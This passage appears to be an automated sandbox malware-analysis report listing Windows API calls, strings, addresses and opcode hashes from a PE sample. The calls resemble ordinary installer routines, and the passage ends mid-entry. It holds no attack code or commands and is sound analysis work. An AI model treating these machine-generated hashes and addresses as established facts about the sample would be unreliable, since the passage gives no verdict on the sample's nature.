                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ObjectSelect$Delete$Stretch
                                                              • String ID:
                                                              • API String ID: 1458357782-0
                                                              • Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                              • Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
                                                              • Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                              • Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 00495519
                                                                • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0049553B
                                                              • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
                                                              • GetTextMetricsA.GDI32(00000000,?), ref: 00495571
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0049558E
                                                              Strings
                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                              • API String ID: 2948443157-222967699
                                                              • Opcode ID: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                              • Instruction ID: fbfe8d588f566b1ae935688c8d8bbf43f3780a3d17a9f30f48774e54417b88ea
                                                              • Opcode Fuzzy Hash: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                              • Instruction Fuzzy Hash: 98018476A04704BFEB05DBE9CC41E5EB7EDEB48714F614476F604E7281D678AE008B28
                                                              APIs
                                                              • GetCursorPos.USER32 ref: 004233AF
                                                              • WindowFromPoint.USER32(?,?), ref: 004233BC
                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
                                                              • GetCurrentThreadId.KERNEL32 ref: 004233D1
                                                              • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
                                                              • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
                                                              • SetCursor.USER32(00000000), ref: 00423413
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                              • String ID:
                                                              • API String ID: 1770779139-0
                                                              • Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                              • Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
                                                              • Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                              • Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                              • API String ID: 667068680-2254406584
                                                              • Opcode ID: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                              • Instruction ID: d6622564654ba01390171a2dbbf88ec7785202fdd48675fe733a6c53722864ad
                                                              • Opcode Fuzzy Hash: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                              • Instruction Fuzzy Hash: 7EF0F692741F156ADA3121660C41B7F6B8CCB917B1F240137BE44A7382E9ED8C0047ED
                                                              APIs
                                                              • GetProcAddress.KERNEL32(02370000,BZ2_bzDecompressInit), ref: 0045D691
                                                              • GetProcAddress.KERNEL32(02370000,BZ2_bzDecompress), ref: 0045D6A1
                                                              • GetProcAddress.KERNEL32(02370000,BZ2_bzDecompressEnd), ref: 0045D6B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                              • API String ID: 190572456-212574377
                                                              • Opcode ID: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                              • Instruction ID: 26f5c6c79611f6cc0facecefa5b4932716cc5d8e9f8ea2477ead0514974f6e87
                                                              • Opcode Fuzzy Hash: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                              • Instruction Fuzzy Hash: 0EF01DB0D00705DFD724EFB6ACC672736D5AB6831AF50813B990E95262D778045ACF2C
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
• InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
  • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
  • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
  • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
• ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
Strings
Similarity
• API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
• String ID: ChangeWindowMessageFilterEx$user32.dll
• API String ID: 142928637-2676053874
• Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
• Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
• Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
• Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
APIs
• LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
• GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
• GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
Strings
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
• API String ID: 2238633743-1050967733
• Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
• Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
• Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
• Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
• GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
• GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
Strings
Similarity
• API ID: AddressProc$HandleModule
• String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
• API String ID: 667068680-222143506
• Opcode ID: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
• Instruction ID: 32a0137ea675787c0bb1f7a77b9c903aea73f6d33f3aa717a8ad139b0a70eb03
• Opcode Fuzzy Hash: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
• Instruction Fuzzy Hash: 4DC0C9F02C1700EEAA01B7B11DCAA7A255CC500728320843F7049BA182D97C0C104F3C
APIs
• GetFocus.USER32 ref: 0041B57E
• GetDC.USER32(?), ref: 0041B58A
• GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
• GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
• GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
• ReleaseDC.USER32(?,?), ref: 0041B626
Similarity
• API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
• String ID:
• API String ID: 2502006586-0
• Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
• Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
• Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
• Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
APIs
• SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
• SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
Strings
Similarity
• API ID: ErrorLast
• String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
• API String ID: 1452528299-1580325520
• Opcode ID: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
• Instruction ID: 81e1e27ad3ae8d1ea1d6b81b4c13ff0be47bc54c17845d393ef4ad8e2f10c1e8
• Opcode Fuzzy Hash: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
• Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
APIs
• GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
• GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
• GetDC.USER32(00000000), ref: 0041BDE9
• GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
• ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
Similarity
• API ID: CapsDeviceMetricsSystem$Release
• String ID:
• API String ID: 447804332-0
• Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
• Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
• Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
• Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
APIs
• RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
• LocalFree.KERNEL32(0069EBD0,00000000,00401B68), ref: 00401ACF
• VirtualFree.KERNEL32(?,00000000,00008000,0069EBD0,00000000,00401B68), ref: 00401AEE
• LocalFree.KERNEL32(0069FBD0,?,00000000,00008000,0069EBD0,00000000,00401B68), ref: 00401B2D
• RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
• RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
Similarity
• API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
• String ID:
• API String ID: 3782394904-0
• Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
• Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
• Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
• Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
APIs
• GetWindowLongA.USER32(?,000000EC), ref: 0047E766
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
• GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
• SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
• ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
Similarity
• API ID: Window$Long$Show
• String ID:
• API String ID: 3609083571-0
• Opcode ID: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
• Instruction ID: 463a5c2536fff799c7bf7cf61cbf8045bc8b98cac2b0bb45a0840e8ed8c25010
• Opcode Fuzzy Hash: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
• Instruction Fuzzy Hash: 53010CB5641210ABEA00D769DE81F6637D8AB1C320F0943A6B959DF3E3C738EC408B49
APIs
  • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
• UnrealizeObject.GDI32(00000000), ref: 0041B27C
• SelectObject.GDI32(?,00000000), ref: 0041B28E
• SetBkColor.GDI32(?,00000000), ref: 0041B2B1
• SetBkMode.GDI32(?,00000002), ref: 0041B2BC
• SetBkColor.GDI32(?,00000000), ref: 0041B2D7
• SetBkMode.GDI32(?,00000001), ref: 0041B2E2
  • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
Similarity
• API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
• String ID:
• API String ID: 3527656728-0
• Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
• Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
• Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
• Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
Strings
Similarity
• API ID: CloseCreateFileHandle
• String ID: !nI$.tmp$_iu
• API String ID: 3498533004-584216493
• Opcode ID: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
• Instruction ID: 7da7e9bbb2667b7856572ae533a3071efe8e017fb0344d9459fa270775feb22d
• Opcode Fuzzy Hash: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
• Instruction Fuzzy Hash: 1831C5B0A00249ABCB11EF95D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
                                                              APIs
                                                                • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                              • ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                              • String ID: .dat$.msg$IMsg$Uninstall
                                                              • API String ID: 3312786188-1660910688
                                                              • Opcode ID: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                              • Instruction ID: abb28459e614be91aca1b68aa70fad33032f6e559e3bf784a216f74f74fa669e
                                                              • Instruction Fuzzy Hash: 89314F34A14114AFCB00EF65DD9296E7BB5EF89314F91857AF800AB395DB38BD01CB68
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: AddressByteCharHandleModuleMultiProcWide
                                                              • String ID: ShutdownBlockReasonCreate$user32.dll
                                                              • API String ID: 828529508-2866557904
                                                              • Opcode ID: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                              • Instruction ID: 7e091cf0cf0c4dae12ae48626bdfb721f4796128e550bb25d34418d77cfbcdd5
                                                              • Instruction Fuzzy Hash: 70F0C8D034061136E620B57F5C82F7B598C8F94759F140436B109E62C2D96CA905426E
                                                              APIs
                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
                                                              • CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                              • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                              • API String ID: 2573145106-3235461205
                                                              • Opcode ID: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                              • Instruction ID: 2f0632834368beac7d1c7250186d6a5b4d0e74160b608b18ba1b2b0c741dc3d5
                                                              • Instruction Fuzzy Hash: 8101A231600204AFD710EBA98C02A5A73A8EB49B25F51407BFC10E73D3DE399E08965D
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                              • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: AddressExchangeHandleInterlockedModuleProc
                                                              • String ID: ChangeWindowMessageFilter$user32.dll
                                                              • API String ID: 3478007392-2498399450
                                                              • Opcode ID: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                              • Instruction ID: c922fa4e85abb1c6873f36dcd01b6443d81c66d6c3501223796626af46e79b09
                                                              • Instruction Fuzzy Hash: 5CE0ECB2740324EADA103B627E8AF663558E724B19F50043BF001751F1C7FD1C80CA9E
                                                              APIs
                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                              • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProcessThreadWindow
                                                              • String ID: AllowSetForegroundWindow$user32.dll
                                                              • API String ID: 1782028327-3855017861
                                                              • Opcode ID: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                              • Instruction ID: d51ed2a8d8be4cb67b0f2e6afaff03014389f5b4c9f6752a27b175deb1fe6994
                                                              • Instruction Fuzzy Hash: D7D0C790248701B9D910B3F64D46E9F3A5D894471CB50C47BB418E61C5DA7CFD04893D
                                                              APIs
                                                              • BeginPaint.USER32(00000000,?), ref: 00416C52
                                                              • SaveDC.GDI32(?), ref: 00416C83
                                                              • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
                                                              • RestoreDC.GDI32(?,?), ref: 00416D0B
                                                              • EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                              • String ID:
                                                              • API String ID: 3808407030-0
                                                              • Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                              • Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
                                                              • Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                              • Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
                                                              • Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
                                                              APIs
                                                              • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
                                                              • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
                                                              • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
                                                              • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
                                                              • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                              • Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
                                                              • Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
                                                              APIs
                                                              • GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
                                                              • GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
                                                              • GetDC.USER32(00000000), ref: 0041BC12
                                                              • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
                                                              • DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                              • String ID:
                                                              • API String ID: 1095203571-0
                                                              • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                              • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                              • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
                                                              APIs
                                                                • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
                                                              Strings
                                                              • Setting permissions on registry key: %s\%s, xrefs: 0047362A
                                                              • Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
                                                              • Failed to set permissions on registry key (%d)., xrefs: 0047368C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                              • API String ID: 1452528299-4018462623
                                                              • Opcode ID: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                              • Instruction ID: ad6b00cc897a6d1501f3fc6a2a631de3da5dc8c6e7b4eccdfad28332e4495c63
                                                              • Instruction Fuzzy Hash: A121C870A046445FCB10DFA9C8826EEBBE4DF49319F50817BE408E7392D7785E098B6D
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                              • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                              • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                              Memory Dump Source
